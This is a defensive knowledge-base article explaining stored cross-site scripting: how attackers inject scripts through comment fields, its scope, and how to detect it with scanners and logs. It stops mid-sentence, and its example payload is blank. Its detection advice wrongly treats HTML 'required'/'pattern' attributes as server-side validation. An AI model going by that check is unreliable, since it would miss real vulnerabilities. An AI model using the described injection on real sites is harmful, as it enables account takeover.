1. Home
  2. Web App Vulnerabilities
  3. How to remediate – Stored Cross-Site Scripting (XSS)
Searching...

How to remediate – Stored Cross-Site Scripting (XSS)

Contents

1. Introduction

Stored Cross-Site Scripting (XSS) is a web security vulnerability that allows attackers to inject malicious scripts into websites viewed by other users. This happens when untrusted data from a user, third party, or uploaded file is included in a webpage without proper checks. A successful attack can lead to account takeover, redirection to harmful sites, and data theft. Confidentiality, integrity, and availability may all be affected.

2. Technical Explanation

Stored XSS occurs when an application stores user-supplied input (like comments or forum posts) and then displays that input to other users without validating or sanitising it first. An attacker can inject script content into the stored data, which is then executed in the browsers of anyone who views the affected page. This requires a vulnerable web application accepting unsanitised input from clients.

  • Exploit mechanism: An attacker submits malicious script code through an input field (e.g., a comment form). This script is saved by the server, and when other users view the page containing this content, the script executes in their browser. For example, submitting `` could display an alert box.
  • Scope: Web applications that accept user input and store it for later retrieval are affected. This includes forums, comment sections, profiles, and any other dynamic content areas.

3. Detection and Assessment

Confirming a vulnerability requires identifying where unsanitised data is stored and displayed. A quick check involves looking at the source code of input forms to see if validation is present. Thorough assessment uses web application scanners.

  • Quick checks: Inspect HTML source code for input fields without server-side validation attributes (e.g., `required`, `pattern`).
  • Scanning: Burp Suite, OWASP ZAP, and other web vulnerability scanners can detect stored XSS vulnerabilities using signatures like ‘XSS Stored’. These are examples only; results should be manually verified.
  • Logs and evidence: Server logs may show the injection of malicious script code in user input fields. Look for patterns matching `